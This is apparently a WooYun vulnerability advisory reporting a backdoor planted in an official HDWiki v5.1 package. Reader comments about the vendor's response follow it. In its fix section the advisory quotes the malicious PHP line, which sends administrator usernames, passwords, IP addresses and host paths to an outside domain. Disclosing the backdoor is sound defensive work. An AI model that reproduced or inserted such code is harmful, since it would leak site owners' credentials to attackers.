当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2012-06877

漏洞标题: 互动百科WIKI某版本被植入窃取帐号密码的后门

相关厂商: 互动百科

漏洞作者: BugFix

提交时间: 2012-05-09 20:54

公开时间: 2012-05-09 20:54

漏洞类型: 内容安全

危害等级: 中

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 HDWiki 攻击案例 源码后门

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

互动百科WIKI系统特定版本中被恶意置入了后门,用于收集管理员帐号、密码、服务器地址等信息。

详细说明:

从官方网站下载的互动百科v5.1 20110927版本文件包中的control/admin_main.php文件被恶意植入后门代码,这段后门代码可以讲管理员的登录帐号、密码、服务器地址等信息发送到一个恶意站点(目前该恶意站点已经无法访问)上,导致网站的私密信息泄露。

漏洞证明:

修复方案:

删除control/admin_main.php文件中第66行的代码,代码如下:

code 区域
@file_get_contents('http://kk.oodnf.com/hdwiki/wk.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);





或下载新版本,新版本漏洞已经修复:

版权声明:转载请注明来源 BugFix@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:12 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
50%
0%
50%
0%
0%

评价

  1. 2012-05-09 23:12 | 北北 ( 路人 | Rank:25 漏洞数:5 | 广告位招租。有阿里、万网的漏洞私信给我有...)
    0

    修复了起码官网给个公告,竟然做开源了,就要担当起一定责任,不能坑自己的用户,您说是吗?不是第一次了吧。

  2. 2012-05-10 09:31 | BugFix ( 路人 | Rank:22 漏洞数:6 | 致力于研究Web应用的安全之道。)
    0

    互动也是受害者,从官方升级包的更新情况来看4.1, 5.0, 5.1的GBK和UTF8版本都在5月9号作了更新。是否被注入了后门代码尚未可知。

  3. 2012-05-10 10:25 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)
    0

    @BugFix 怎么你也发现了?

  4. 2012-05-10 13:14 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
    0

    缺陷关联: WooYun: Dedecms疑似被植入后门 (开源软件源代码级别后门)。PS:貌似这类漏洞一般是直接忽略公开以便各位快速响应事件的,请参阅该关联内的评论。

  5. 2012-05-11 11:20 | 互动在线(北京)科技有限公司(乌云厂商)
    0

    新版在当天已经修复,谢谢大家的反馈~

  6. 2012-06-15 10:42 | BugFix ( 路人 | Rank:22 漏洞数:6 | 致力于研究Web应用的安全之道。)
    0

    @koohik 碰巧遇到了!

登录后才能发表评论,请先 登录